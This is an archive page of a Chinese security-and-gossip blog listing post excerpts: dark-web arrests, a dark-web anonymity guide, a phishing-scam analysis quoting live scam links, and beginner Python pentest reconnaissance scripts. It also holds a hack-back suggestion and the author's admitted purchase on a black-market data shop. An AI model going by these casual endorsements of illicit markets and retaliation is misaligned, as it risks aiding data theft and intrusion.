网站首页 关于作者 A.毒蜂 的所有文章

  • 又一暗网中文网站被警方端了

    什么是“暗网”?利用加密传输、P2P对等网络等,为用户提供匿名互联网信息访问的一类技术手段。其隐蔽性很强,沦为不法分子的犯罪之地。连日来,浙江余姚市公安局网警大队接连成功破获了两起利用“暗网”非法牟利的案件。其中一名在校大学生和一名在创业的富二代,因沉沦暗网不法交易被抓获!在校的大学生暗网上做起“大生意”:贩卖淫秽物品!6月初,网警大队民警在网络巡查中发现,一名用户在某暗网论坛上出售淫秽物品,每份淫秽物品售价在5美元到10美元不等。交易后,卖家通过百度网盘将淫秽物品链接分享至买家手经查证,每份链接内包含了200余部淫秽视频及800余张淫秽图片。论坛显示,该淫秽物品已累计交易成功30余次。经侦查,民警迅速锁定了该名用户的真实身份信息。7月5日晚,余姚市公安局低塘派出所在网警大队的配合下,远赴贵州省盘州市,将该名利用暗网贩卖淫秽物品牟利的在校大学生胡某成功抓获。经审讯,胡某今年22岁,大学所学专业与信息技术相关。2018年下半年,胡某在学习中偶然接触到了使用暗网的相关技术。暗网的内容,极大地勾起了胡某的好奇心。2019年年底,胡某因家庭条件困难,缺少收入来源,萌生了通过暗网贩卖淫秽物品牟利的想法。随即,他在同一暗网平台内购买了淫秽物品链接,并以相同手法进行贩卖。直到被捕,胡某共利用暗网贩卖淫秽物品牟利人民币3000余元。90后的富二代暗网里大肆贩卖公民个人信息30万条!六月中旬,网警大队民警在网络巡查中发现在某暗网中文论坛内一名用户大量出售公民个人信息。民警在调查中发现,该用户所出售数据涵盖了公民日常生活的多个方面,极易被诈骗等犯罪团伙利用,潜在危害大。网警大队随即组织民警展开侦查。在迅速锁定了该名用户的真实身份后,6月22日下午,网警大队在三七市派出所、河姆渡派出所的配合下,赶赴广东省广州市一办公楼内,将犯罪嫌疑人陈某成功抓获。经审讯,陈某今年22岁,目前在广州某公司内担任电话销售。据民警调查,陈某其家庭情况相当不错,是个富二代。但一直以来,他与父母关系较为紧张。初中辍学后,为增加收入,陈某自行学习了信息技术,雄心勃勃开始创业。在今年年初,他逐渐接触到了暗网。暗网论坛中充斥着大量的公民个人信息交易活动,令陈某嗅到了非法牟利的“商机”。4月份以来,陈某不断尝试将暗网论坛中购买的公民个人信息通过境外聊天软件进行出售。尝到了不法收入的甜头后,陈某随即将公民个人信息大量出售在了另一暗网论坛中,以赚取差价。直到被捕,陈某利用暗网累计出售数据30余万条,从中非法获利5000余元。目前,胡某与陈某均已被余姚警方依法采取刑事强制措施,案件正在进一步办理中。余姚市公安局网警大队民警介绍,所谓“暗网”,是利用加密传输、P2P对等网络等,为用户提供匿名互联网信息访问的一类技术手段。“暗网”的最大特点是经过加密处理,普通浏览器和搜索引擎无法进入,很难追查到使用者的真实身份和所处位置。民警提醒暗网并非法外之地,任何利用暗网从事非法活动的个人或组织,都将面临法律的严惩。QQ群号:979727860 点击链接加入群聊:https://jq.qq.com/?_wv=1027&k=FDmmUxxL ...

    2020-07-12 772
  • 暗网安全指南|15项措施,教你如何安全的访问暗网

    如果没有取正确的预防措施,暗网可能是非常危险的地方。使用优质的防病毒软件和像样的代理,可以保持相对安全。但是,如果你想完全匿名并保护您的设备,则您将需要的更多,可以参照以下15个措施: 确保您掌握了基础知识 使用移动实时操作系统(可选) 使用代理加密您的互联网流量 从其官方网站下载Tor 采取安全预防措施 Tor浏览器中的禁止脚本 在Tor浏览器中更改安全级别 检查是否没有IP,DNS或WebRTC泄漏 使用其他匿名服务 避免登录,订阅和付款 知道你要去哪里 使用加密货币 完成后关闭所有内容 意识到您永远不会100%安全 咨询在线指南,博客,搜索引擎,聊天网站等。 1.确保您掌握了基础知识 这听起来可能很无聊。但是暗网是一个复杂的地方,很多地方都可能出错。它到处都是骗子,恶意软件和网络钓鱼网站。有时候,边做边学会更好。但是,对于暗网,这不是最佳方法。在您不了解恶意软件的工作原理之前,您最好不要不让其感染恶意软件或损失大量金钱。暗网上有太多想滥用无知的人。 这就是为什么在下载软件或开始浏览之前,准确了解要在暗网上实现的目标很重要。如果您知道自己想做什么或在暗网上发现了什么,则可以更好地做好准备: 如果您只是在寻找令人兴奋或与众不同的东西:请确保您知道如何安全地浏览暗网。 如果您试图通过比特币或其他加密货币获利:请确保您了解加密货币的工作原理,区块链是什么以及与其他用户打交道的可靠平台。 作为举报人,确保您完全匿名非常重要。暴露某些事物可能会花费您的工作,或者在某些国家中您的自由。通过尽量保持匿名,可以防止掩盖。 2.使用Live Mobile OS(可选) 在暗网,匿名是最重要的保护。不是因为暗网是非法的(不是),而是因为您越匿名,您就越安全。不幸的是,像Windows 10这样的操作系统不太适合暗网中的隐私。Windows会执行以下不利于您匿名的操作: 您的数据会不断同步:浏览器历史记录,打开的网站,应用设置和Wi-Fi热点都将被跟踪 您的设备会自动链接到第三方的唯一广告ID Cortana收集数据,例如:您的击键,搜索结果,麦克风音频消息,日历信息,音乐播放列表,甚至是您的在线购买 Microsoft可以收集各种个人数据:您的身份,密码,习惯和兴趣,用户数据,联系人和位置 如果黑客设法通过暗网进入您的系统,则所有这些信息都可能被该黑客利用。Windows中的许多设置都可以轻松关闭(尽管不是全部)。您可以通过Windows中的设置或使用诸如W10Privacy之类的精美软件来完成此操作。 与通过Windows 10在暗网上进行交流相比,更好的主意是使用Tails,Whonix,ZuesGuard或Qubes等实时移动操作系统(OS)。 3.使用代理加密您的Internet流量 即使您使用Tor浏览器,只要有足够的时间,资源和专业知识,任何人都可以追踪您的流量。实际上,Tor浏览器在2017年被发现存在漏洞,在某些情况下会泄漏真实IP地址。 对于MacOS和Linux用户,上述问题特别严重。如果这些用户采取了预防措施,也可以在后台运行代理,那么他们的真实IP地址就不会受到损害。 因此,强烈建议您在浏览暗网时除Tor之外还使用代理。 代理会加密您的网络流量,并确保您的IP地址不会受到任何黑客或政府的监视,即使Tor浏览器内部存在漏洞。 但是请注意,并非每个代理提供商都同样可靠。免费版本经常遭受服务速度慢,数据限制和安全漏洞的困扰。 4.从官方网站下载Tor 诸如Tails和Whonix之类的移动实时操作系统已经预装了Tor浏览器,因此如果使用它们,则可以跳至步骤5。对于Windows,Mac,Linux或Android用户,这很重要。 Tor浏览器是黑客和政府机构感兴趣的目标。伪造的Tor浏览器版本是为了在用户甚至访问暗网之前就破坏用户,或者在暗网中监视用户的行为。后一种方法对政府机构特别有吸引力。 因此,您应该始终从其官方网站下载Tor浏览器:https : //www.torproject.org/ 确保始终下载最新版本的浏览器,并始终保持最新。或者可以加群下载群内的tor浏览器与tor官网同步更新 QQ群号:979727860 点击链接加入群聊:...

    2020-07-11 8061
  • 震惊!淘口令竟被用来访问钓鱼站+支付宝付款骗钱

    也许你在正常交易时碰到过这样的事情: 开始分析 ¥jLFM1x086Lm¥淘口令解析结果: 淘口令链接:https://login.taobao.com/member/ ... rd-Outside.windvane 淘口令标题:陪玩#可夜 淘口令剩余时间:28天0小时3分9秒 然后先把短连接打开,发现会自动跳转http://suo.im/6bvtlW,解析后的原链接:http://zhuanzhuan-58.com/xy/?i=5 ... 17u&ClickID=616 后面参数先不要管,打开,这个网址贼骚,检测到你电脑访问就跳转咸鱼,手机访问正常 (现在手机也打不开了,全部跳转咸鱼,主站跳转百度,骗子日常操作) 什么买耳机被坑,这不是搞陪玩被骗了,这是一个高仿咸鱼的网站。点击我想要,会提示淘宝打开,然后出现付款。 (楼主说咸鱼有网页支付,但是咸鱼客户端付款是不支持网页支付,这里因为是网页打开,所以出现了网页支付) 接着调用支付宝,然后你懂的!出现付款界面,收款商家为那个交易猫,老规矩,冲q币洗白。 至于跳转后面的参数百度搜索TaoPassword-Outside.windvane,会发现好多类似熟悉参数的淘宝客链接或者聚划算链接之类,这一堆参数估计是为可以生成淘口令用的(淘口令生成有严格参数限制的),没玩过淘口令就不解析了。 事情总结 这事应该淘宝背锅,竟然不搞白名单,咸鱼兼容淘宝口令的方式通过网页版打开淘宝链接的,而且是自动登录的,所以假如一个假的淘口令,当你复制到咸鱼后,他会自动登录你的淘宝账号,然后跳转到http://suo.im/6bvtlW, 所以故事是这样的: 正常路径: 用户复制淘口令到咸鱼,咸鱼会以网页形式打开链接,并自动登录(大家可以复制一个淘宝口令试一下),不用登陆可以下单购买,付款只能支付宝付款(没有网页付款) 被骗路径: 用户复制伪装的淘口令,咸鱼以网页形式打开淘宝,然后自动跳转到到http://suo.im/6bvtlW,就好比你自己手机开个浏览器打开http://suo.im/6bvtlW,剩下不解释了,都是常规骗人套路 只能说想到这个方法的人牛逼啊!!!!!!! 总结: 各位在QQ 、微信等聊天工具、复制淘口令时,应注意 URL 地址以及付款时的页面!避免被骗! ...

    2020-07-09 939
  • 成都电子科技大学被印度留学生黑了

    成都电子科技大学被印度留学生搞了,教学楼显示屏出现“拒绝中国制造”口号?自从前段时间中印边境冲突之后,印度反华的情绪就一直居高不下,从最开始抵制中国制造,砸电视、砸手机,到后来下架国内59款APP。 钉子刷微博的时候刷到一个ID上帝之鹰发的成都电子科技大学清水河校区品字楼C区的教学楼显示屏上面出现了“给我离南亚远点,抵制中国制造”的字样,怀疑是阿三在校留学生搞的鬼? 校方在接到学生反映,一些教学楼的显示屏上出现了“离南亚远点,抵制中国制造”(Stay Away From South Asia, Boycott Made in China)字样后,第一之间成立了专项小组,表示严肃处理。 首先的处理方式是将被黑的电子屏拆除,并关闭了其他所有显示屏。 虽然校方第一时间做出了反映,但是学校论坛里已经炸了,学生全部怒不可遏。 敢在我们本土这么干,现在阿三都这么猖狂了吗? 网上也有很多人质疑校方的态度:“我们要的不是拆电子屏,我们要的是抓出肇事者,公布对肇事者的处理结果”。 还有一些留言说电子科技大学对于留学生管理过于宽松。“这并非该校第一次特殊对待留学生,中国国内新冠肺炎疫情刚结束,学生返校的时候,中国学生被禁止出入,留学生却可以随意出入,后来校内反对声音太大了,才允许中国学生出入。” 毒蜂想有一些问题值得质疑,作为985,211水平的一流电子科技大学,为什么还能被阿三攻破内网管理系统在显示屏上挂图片?这网络信息安全水平是不是有待提高? 这是要让我们网络打印小队找个印度高校反击一下了? ...

    2020-07-09 599
  • 突发,TG闲鱼市场跑路了!

    暗网出现一则出售“5.38亿微博用户绑定手机号数据”的交易信息,我们报道过,TG有一个闲鱼市场,有各种黑产数据。都有什么东西。比如:定位:都需要比特币充值就在前几天毒蜂,刚充了比特币,今天有人微信跟我说暗网闲鱼市场跑路了!我打他们的群看了一下。群里有67884人。我亲自测试了一下他们的市场的机器人,真的不回复消息了。前几天发消息,会有机器人自动回复,今天没人回复了。 毒蜂猜测有三种可能性 1,真的跑路了。2,被抓了。3,机器人坏了。 TG用户越来越多,国内搞安全的都在想办法破解。早晚有一个会破解成功的,比如skype,whatapp。如果真的能解密谁在登陆,聊天内容。也就是TG暗网市场倒闭的那天。毒蜂就没想到,我刚冲钱还没消费就跑路了,你这个王八蛋。截至发稿时间,闲鱼机器人还是没好,群主也没看见,我们将持续关注。如果大家有最新消息,也可以留言交流。...

    2020-07-09 1210
  • 手机窃听准确率可达90%

    最近,浙江大学网络空间安全学院院长任奎与加拿大麦吉尔大学、多伦多大学的研究小组联合发布了一项针对智能手机窃听攻击的研究成果:利用手机内置的加速传感器,当用户不知情的时候,智能手机 APP可以对用户语音进行窃听,并且准确率达到90%。 加速传感器也称为加速计,是目前智能手机中最常见的一种内嵌传感器,主要用来检测手机自身的运动情况,如平时常用的步数统计和游戏控制等应用场景。不像麦克风、照相机等为公众所知的硬件,它们可能获取个人敏感信息,因为加速器似乎与诸如语音通话、短信等敏感信息没有实际联系,因此,当收集智能手机的加速度信息时,不需要用户授权。但是,正是这款不起眼的设备,可能让人们陷入隐私泄露的危机。任奎表示,加速度计可以用来侦听电话,这主要是由于智能手机本身的物理结构。我们都知道声音信号是由振动产生的声波,它能通过各种介质传播。所以来自手机扬声器的声音就会引起手机本身的震动。而且,加速计可以精确地感觉到手机震动——攻击者可以通过它捕捉由声音信号引起的手机震动,并推断出其中包含的敏感信息。总体而言,这是一种应用非常广泛的攻击方法,并且对用户隐私构成严重威胁。语音监听的准确性与特定的监听任务有关。基于实验结果,该方法能以平均90%的准确率在关键词检测任务中识别和定位用户语音中携带的关键词。在训练自己的攻击模型时,攻击者可以自己选择要识别的关键词。对于数字识别任务,这种窃听攻击的准确率可高达80%,能区分0到9这10个数字的英文发音。「正确率下降的原因,是数字发音更简单,而复杂词的正确识别率更高」。任奎解释说,这种攻击对场景没有特殊要求,即使是使用手机边走边打受害者的时候,攻击者也能准确识别手机喇叭播放的语音信息。就像人类的听觉系统一样,声音的清晰度也会影响这种攻击的准确性。不同手机系统的窃听效果是不是不一样?任奎表示,在不同的手机系统中,加速度计的窃听效果可能有所不同。首先,加速度计在不同手机系统上的使用限制不同。例如, IOS要求访问加速度计的所有应用程序提供一个句子,以说明为什么要收集加速度计的数据,根据这个要求,显然没有使用加速度计的应用程序可能不能实施这种窃听攻击。另外,各个手机系统在后台收集加速计数据的机制上也有所不同,这将影响窃听攻击的实际应用场景。另外,手机本身的结构和性能也会影响窃听的实际效果。对于不同型号的手机,加速度计采样率与采集的声音信号强度可能有一定的差异,从而影响最终的语音识别效果。怎样才能防止这种窃听方式?任奎表示,作为普通消费者,在各大手机厂商提出进一步解决方案之前,最有效、最方便的防御方法就是通过耳机听电话或语音信息。由于移动电话中的加速计和耳机之间的物理隔离,导致它不能接触到耳机产生的振动,所以通过耳机播放的声音不会受到这种攻击。主要手机厂商应提高加速度计的使用权限等级,尽量避免各类应用在不需要的情况下采集加速度计;也可对加速度计的采样频率加以限制,或提前过滤掉含有最多语音信息的高频部分。为了避免在未来出现类似的漏洞,建议主要厂商重新评估各个传感器的安全性和灵敏度,修改 Android操作系统,授权手机 APP调用各种传感器数据,像鸿蒙 OS这样自主可控的操作系统更能从系统层面上进行考虑,杜绝未来的侧通道攻击。...

    2020-07-09 640
  • 北京一男子讨好女主播疯狂刷礼物,一分没花还赚钱

    直播行业在国内已经火了几年,除了一些视频以外,也兴起了不少语音形式的直播。前段时间,警方接到某科技公司报警,说自己旗下的一款直播聊天软件中,一个用户每天都在购买刷礼物用的虚拟币,但是后台却一直没有进账,用户冲了七万多,公司一分钱没收到。图上是该直播聊天软件后台收入的趋势图,报案者称软件内一用户每天都会进行大大小小的充值,但是公司后台却一直没有收到进账,单从软件这里无法查到是怎么回事。 警方在接到报案后立马开始展开调查,发现这位用户利用平台不能验证支付单据的真实性这一漏洞,使用虚假的支付单据进行充值,进行盗充虚拟币。警方根据资金流与证据链,最终将犯罪嫌疑人刘某锁定。经调查,刘某今年26岁,是一家软件公司的实际运营人,一月份的时候,他发现这款聊天软件存在漏洞,便利用技术手段盗取了价值七万余元的虚拟币,然后给女主播刷礼物。刘某利用漏洞充值后给平台的女主播刷礼物,虚构自己的身份,并且还和多个主播进行合作,双方约定刘某每刷一笔钱,都会分给自己20%的提成。几个月的时间,利用这种套现方式非法获利8000多元。最后刘某因涉嫌诈骗,被警方刑事拘留。...

    2020-07-06 589
  • 微信出现这个界面千万要当心:这15分钟很关键

    微信安全中心发布最新提醒——如果你的手机出现这个界面一定要提高警惕,说明你当前支付存在巨大风险,很可能处在骗局之中,这15分钟,非常关键。微信官方介绍,在付款过程中,当系统识别出收款方账户有异常特征时,微信会根据风险的程度对用户进行交易风险提醒或拦截。 当系统识别出收款方账号涉嫌欺诈违规,或者恶意程度较大,微信会对交易进行拦截保护,提醒用户注意资金安全,比如短视频中对付款用户进行15分钟的保护限制。 也就是说,当你收到上面这样的风险提醒或拦截时,很可能正身处骗局之中! 在15分钟的“转账冷静期”内,你应该尽量核实收款方的身份,仔细想想是否存在风险。“转账冷静期”解除后,可以根据核实后的情况选择是否继续支付。 微信支付团队提醒: 1、网购需谨慎。“先付款后收货”的交易方式风险很高,在社交平台上进行交易要提高警惕,谨慎确认,尽量使用可信的官方交易渠道。这样即使出现问题,也可以通过平台申诉退款退货。 2、使用微信支付时,若出现“风险提醒”要加倍小心,你很有可能正在陷入骗局。 ...

    2020-07-05 679
  • 微博|上专注分享福利图片的博主

    微博经过一次又一次的整顿,现在像样的福利内容越来越少了,很多福利图片发出去没多久,就直接被和谐显示不了,不过依旧有一些老司机在夹缝中生存,源源不断的给网友们提供着来之不易的福利。 这里推荐一些: https://weibo.com/u/6881429728 https://weibo.com/u/6997079601 https://weibo.com/u/6429328867 https://weibo.com/u/6153687969 https://weibo.com/u/2009978817 https://weibo.com/u/6934643484 https://weibo.com/u/6129275701 https://weibo.com/u/2370207792 https://weibo.com/u/2615014574 https://weibo.com/u/6534263237 https://weibo.com/u/6991716818 https://weibo.com/u/3286814225...

    2020-07-05 1468
  • 最新快速联系腾讯人工客服的方法

    使用过腾讯系统的软件的人都知道,腾讯一般都是机器人客服,想要找到人工客服几乎是没有端口给你接入的,那么是不是就没有人工客服了呢,其实也是有方法能联系到他们的,下面小编就来给大家介绍一下2020最新联系腾讯客服方法,快来一起看看吧! 联系方法 1.用手机拨打电话0755 8601 3860  2.按提示操作然后微信会给你发消息 3.点进去等待接通 提示繁忙继续等 就可以接通客服...

    2020-07-05 695
  • QQ清明上河图XML卡片代码

    <?xml version='1.0' encoding='UTF-8' standalone='yes' ?> <msg serviceID="60" templateID="14" action="web" brief="进来学习中国古代美术!" sourcePublicUin="3043786528" sourceMsgId="1495460701626432" url="http://www.dufengvip.cn" flag="3" adverSign="0" multiMsgFlag="0"> <item layout="1" advertiser_id="0" aid="0"> <vote cover="http://gchat.qpic.cn/gchatpic_new/1169088181/4177879595-3121117498-74EB28C523F12CE933EEF3BCF50D4ED1/0" /></item> <item layout="0" advertiser_id="0" aid="0"><hr hidden="false" style="0" /> </item><source name="" icon="" action="" appid="-1" /></msg> ...

    2020-07-05 2767
  • telegram(电报)汉化版教程

    Telegram是一个跨平台的实时通讯应用。Telegram的主要优势是,它非常安全、免费、没有广告并且功能强大。对比于其他同类通讯软件来说,在用户体验上做得非常好。但是,在国内是无法访问的,至于原因,大家都懂的。 加群里面有和汉化版tg、梯子 QQ群号:979727860 点击链接加入群聊:https://jq.qq.com/?_wv=1027&amp;k=FDmmUxxL CEKNoNimQH-f1Ra94?imageView/2/w/800" title="telegram(电报)汉化版教程" alt="telegram(电报)汉化版教程" border="0" width="750px" height="1344px" /> Telegram官网为:https://telegram.org/,目前已发布安卓、IOS、PC、Mac、Linux版本。已发布的版本中没有中文版,但官方为用户提供了汉化助手,用户可以手动轻松的将软件转为中文版。 下载并注册好 Telegram 后,在界面顶部的搜索框中输入@zh_CN(注意:包含@),进入“Telegram-zh_CN project”频道,在此频道内就能看到官方发布的汉化方法了,按照使用方法设置后,界面就能够以中文显示了。 ...

    2020-06-25 1993
  • 苹果安卓均可修改微信号了

    6月17日置顶:官方已通告,苹果手机也可以改了! 先把微信更新到最新版本,然后打开微信->我->设置->账户与安全->微信号->修改即可 (一年可以改一次)必须要是最新版微信,如果改不了退出重新登录试试! 还是没显示能修改就耐心等待,需要一个覆盖过程! 官方说明:https://mp.weixin.qq.com/s/uAJZ-9luDbTuLJuInGvGCA ...

    2020-06-20 531
  • 中国联通在线销户教程

    步骤如下: 1、打开联通营业厅APP--【服务】--【办理】--【销户】 2、根据要求上传所需要的资料即可,有多余的号的可以注销了  PS:话费余额可以转移到银行卡,其他手机账户,沃账户等等! 如果转移到银行卡的小伙伴小编建议在注销之前咨询下客服。 据说通过官方充值的才会退到银行卡 第三方充值的不行!...

    2020-06-20 666
  • 用python编写自动信息收集脚本(三) -ip收集

    本人只是python初学者,本文只适合初学者观看学习。大佬请绕过(或者指出需要改进的地方)!在日常渗透测试过程中我们都知道,在对目标进行渗透之前都是先要信息收集一波。收集到越多的信息往往渗透过程中越顺利,所以信息收集格外重要。而信息收集往往费时间比较多,所以我们想写一个自动信息收集的脚本,但是代码量太大。本文就先从whois信息开始,代码不好的地方。希望大家提出意见! 本次模块配合之前的用python编写自动信息收集脚本一,二使用 import threading #多线程 import requests import time from lxml import etree import re #正则表达式 import csv import telnetlib #建立tcp链接 实现端口扫描 class xxsj(object):     def __init__(self):         global dk #创建全局变量,后面端口扫描用         self.wz = input("请输入您想查询的网站") #接收网站地址         dk = self.wz         self.a = re.sub(r"www.","",self.wz) #正则表达式,匹配www. 然后删除         self.header = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36'}     def ip(self):         url='https://dns.aizhan.com/' self.wz '/' # url地址         print("----在获取ip地址----")         response = requests.get(url=url, headers=self.header)         selector = etree.HTML(response.content)         title = "IP地址"         global ab #创建全局 ...

    2020-06-20 626
  • 用python编写自动信息收集脚本(二)网站信息搜集

    本人只是python初学者,本文只适合初学者观看学习。大佬请绕过(或者指出需要改进的地方)!在日常渗透测试过程中我们都知道,在对目标进行渗透之前都是先要信息收集一波。收集到越多的信息往往渗透过程中越顺利,所以信息收集格外重要。而信息收集往往费时间比较多,所以我们想写一个自动信息收集的脚本,但是代码量太大。本文就先从whois信息开始,代码不好的地方。希望大家提出意见! 本次模块配合之前的用python编写自动信息收集脚本(一)使用 def xx(self):     url = 'https://www.aizhan.com/seo/' self.wz     response = requests.get(url=url, headers=self.header)     selector = etree.HTML(response.content)     title = selector.xpath('//*[@id="icp"]/li[1]/text()')[0]   #备案号 获取li[1]下的文本     infor = selector.xpath('//*[@id="icp_icp"]/text()')[0]   #备案信息     a = selector.xpath('//*[@id="icp_company"]/text()')[0]   #公司性质     b = selector.xpath('//*[@id="icp_type"]/text()')[0]    #公司名称     c = 1     for i in range(0, 2):     #写两次  将四个变量两次写人csv文件中         if c == 1:             self.write([title, infor])             c = c 1         else:             self.write([b, a]) ...

    2020-06-20 801
  • 用python编写自动信息收集脚本(一)

    本人只是python初学者,本文只适合初学者观看学习。大佬请绕过(或者指出需要改进的地方)! 在日常渗透测试过程中我们都知道,在对目标进行渗透之前都是先要信息收集一波。收集到越多的信息往往渗透过程中越顺利,所以信息收集格外重要。而信息收集往往费时间比较多,所以我们想写一个自动信息收集的脚本,但是代码量太大。本文就先从whois信息开始,代码不好的地方。希望大家提出意见! import requests from lxml import etree import csv class xxsj(object):     def __init__(self):         self.header = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36'}     def whois(self):         wz = input('请输入您想信息收集的网站:')         print("正在whois查询",)         url = 'https://whois.aizhan.com/' wz         response = requests.get(url=url, headers=self.header)         selector = etree.HTML(response.content)         title = selector.xpath('//td[@class="thead"]/text()')         yuming = selector.xpath('//td[2]//text()')         a = len(title)         for i in range(0, a - 1):             title1 = title             yuming1 = yuming             self.write([title1, yuming1])     def write(self,lis):         with open('信息收集.csv', ...

    2020-06-20 1120
  • 印度黑客能打赢对华网络战吗

    印度是一个对于自身实力有着迷之自信的国家,自从1947年脱离英国殖民统治建国以来,印度一直想要拥有控制南亚次大陆,并且将自己的影响力辐射到整个印度洋的能力,不过受限于本身实力的不足,印度的这种霸权主义思维更多是以吃瘪告终,前几天,中国与印度在边界冲突,中印军人打架,没动枪。打死好几个印度军人,印度最高一个上校被打死。印度全国民族主义高起,不买中国货,砸中国电视,中国手机。增兵冲突地区。我们中国也没示弱,一样大量增兵冲突地区。who 怕 who? 印度黑客也叫嚣要对华网络战。我们今天就来聊聊印度黑客能打赢对华网络战吗? 前几天,公民实验室Citizen Lab(简称:Citizen Lab)扒掉了一家印度公司的底裤。Citizen Lab的研究员称其正在进行:“有史以来规模最大的雇佣间谍活动之一。” BellTroXInfoTech(简称:BellTroX)是一家貌不惊人的印度信息技术服务公司,明面上,它扮演着好好先生的角色,是一家服务于医院、诊所、专家证人、独立从业者和企业等群体的转录和听写服务提供商。 背地里,他却则干着为客户提供黑客间谍情报服务的勾当,在长达7年的时间里对全球超过1万个电子邮件账户进行了入侵。把邪恶的触手伸向了欧洲的政府官员、巴哈马的博彩大亨以及美国著名投资机构等群体,其中就包括美国私募股权巨头KKR和做空机构浑水(Muddy Waters)。 没错,那家忙着调查别人家的公司,实际上,它也在被别人“调查”。 (BellTroX公司官网) “印度无名小IT公司”罪行初现端倪 2017年,一名被钓鱼攻击的记者向Citizen Lab求助,询问是否可以对不堪其扰的钓鱼邮件进行调查。随后,Citizen Lab对发来的钓鱼链接进行了溯源分析, Citizen Lab很快发现,这很可能是一个“黑客雇佣军”在全球范围内发起的黑客入侵活动。 CitizenLab将这一黑客雇佣军组织标记命名为 “Dark Basin”(黑暗盆地)。 跨越万里的邮件 ,一路追溯到印度 在对钓鱼链接进行了溯源分析时,Citizen Lab通过技术手段追查到了大量包含相同钓鱼链接的URL地址。在这里,Citizen Lab顺利的找到了抽丝剥茧的线头。 他们发现,在大量的钓鱼邮件中,有数百封邮件中的时间戳与印度UTC + 5:30时区的工作时间相吻合,可以加以猜测,这些邮件的源头可能是印度。 接下来,Citizen Lab又相继在Dark Basin组织使用的URL缩短服务中发现了几个与印度相关的名词:Holi,Rongali和Pochanchi,它们分别是印度宗教中两个著名的节日,以及音译的孟加拉数字“55”。 在钓鱼邮件的日志记录代码中,有些代码也以UTC + 5:30记录了时间戳,日志文件还显示Dark Basin似乎使用印度的IP地址进行了一些测试。 这绝非巧合。 毕竟再高超的黑客技术,也难以掩盖技术背后那些人的生活痕迹。 (Dark Basin使用的URL缩短服务) 有记忆的互联网,难以清除的蛛丝马迹 紧接着Citizen Lab继续顺着发现的线索一路查了下去,当他们在印度的一些网站进行信息检索时再次有了新发现。他们在领英上发现了一家名为BellTroX的公司。该公司雇员的工作职责描述写的十分耐人寻味,描述中这样写道:工作内容包括电子邮件渗透、广告推销、企业间谍、声波发射、提供网络情报等。 BellTroX公司的雇员们还在社交媒体上发帖赞扬了攻击技术,并附上了含有Dark Basin相关链接的截图。(BellTroX公司员工在社交媒体中发布的攻击技术讨论贴) 就这样经过一步步推敲,Citizen Lab最终捋清了Dark Basin与BellTroX之间千丝万缕的联系,BellTroX公司就是操纵Dark Basin组织的幕后黑手! 以往中国黑客,俄罗斯黑客、美国黑客会不时出现在新闻头条里,但现在印度黑客也开始崛起,成为一股不可忽视的力量。 由于历史原因,印度在经济上比较依赖欧美,经济联系也比较紧密。印度人在软件开发上有着语言上的优势,例如一个印度中学生把主要精力花在学软件上就行了,没有语言障碍。所以,欧美要搞外包,肯定会首选印度。印度去欧美留学的学生非常多,他们成绩好,无论在欧美工作还是在印度工作,都在学习。印度的教育体制是比较灵活的,他们为印度培养了一大批软件开发者以及各阶段的工人,他们接收着欧美的经营管理思想,为外包培养了一批先行者和管理者。但印度并不像中国一样,家家都买得起电脑,他们很喜欢通过技术赚钱,所以黑客安全组织也比较多,但很松散。因为他们的国家缺乏像美国硅谷那样的地方,无法将一些网络专家的技能转化为高薪工作,这也进一步带动了印度黑客文化的发展。 最近印度黑客安全组织也开始高调进入媒体的视线了,印度趁着我国爆发新型肺炎期间,黑客却盯上了我国肺炎的情况。利用新型病毒题材文档攻击。后来经过侦查发现,发起此种攻击的是印度的黑客组织APT,该黑客组织采用的是鱼叉式钓鱼攻击方式,通过邮件文档投递进行诱饵式入侵。只要医疗机构点开这些文件就会受到入侵。据业内人士分析称,印度黑客入侵我国医疗机构具有几种原因,一方面为了窃取我国最先进的医疗技术和信息,另一方面可能是为了窃取我国医疗设备数据,还有一种可能是,印度想要制造更多其它不稳定的因素!接着他们在一社交网站扬言印度黑客是世界第一,美国才第二。他们还表示,中国在互联网方面比较落后,还排不上名。到第二天,该黑客安全组织的网站被黑掉了,首页被挂上We come from China及一个星星标志;并且在社交网站发的那条说说也神奇地失踪了。据调查,这个的确是源自中国的标志,但策划这一行动的是在印的一个华人网络黑客安全小组干的,他们都是来自中国,并且声称是华夏黑客联盟的成员;他们是看不惯印度黑客组织的嚣张,所以才把它给黑了,并告诉他们:“懂英文不是炫耀的资本,懂技术才是真正的高手”。随后印度黑客组织被吓得魂不守舍,再也不敢高调了。 https://www.quora.com/Can-Indian-hackers-win-the-cyber-war-with-China 国外知乎,有网友提出这样一个问题 Can Indian hackers win the cyber war with China?印度黑客能打赢对华网络战吗? quora读者的评论:Dhruv ApteWell it might be shockingly true but Indian hackers might lose the race to Chinese ones....they are better trained and more sophisticated说出来也许你会震惊,不过印度黑客应该会输掉对华网络战。中国黑客更训练有素,技术更精湛。 Mihir Karbelkar, Studies at Vellore Institute of Technology, BhopalIt is not necessary that we wil lose against China. China may have many hackers but not all maybe very skilled. Indians utilise their resources effectively, forgot about Mars orbiter mission. If the "war" starts , at first, we will have less soldiers but we will progress and bring them down.我们不一定会输掉对华网络战。中国的黑客也许不少,但是并非所有黑客的技术都很精湛印度人会充分利用本国资源,比如印度就成功向火星发送了探测器。“战争”爆发初期,我们的黑客也许没他们多,不过我们会进步,然后打败他们 Abhishek Joshithe indian hackers will find it very hard to win a war againts chinease..i am not anti india but telling you the truth...Indian goverment does not have any organization unlike china where all hackers work together .In case of an cyber war the Indian goverment will first ask all hackers to retaliate but that can take some time...also note that china has used it technocrats in way to put all there efforts in defending there networks and trained them in an offensive way to attack cyber space.印度黑客会发现很难打赢对华网络战。我不是反印。跟你们说吧,印度政府并未建立黑客组织,而中国让所有黑客一起工作。一旦爆发网络战,印度政府会要求所有黑客发动报复,不过这需要时间来组织。 In china there is whole leading unit of army whose sole task is to attack cyber space, while in India we do not have any uniform structure.Also note that it is not neccesaary every Indian hacker will be that good so it hack there every website.Also note that language is other barieer as most of routers and computers in china are set to run on mandarian it will become more difficult for Indian hackers to attack there.中国有一支专门用来攻击网络的军队,而我们印度没有这样的组织。语言是一个障碍,中国大多数路由器和计算机用的是中文操纵系统,给印度黑客的入侵造成了更大的困难。 ...

    2020-06-20 531
  • 2020护网红方漏洞利用总结

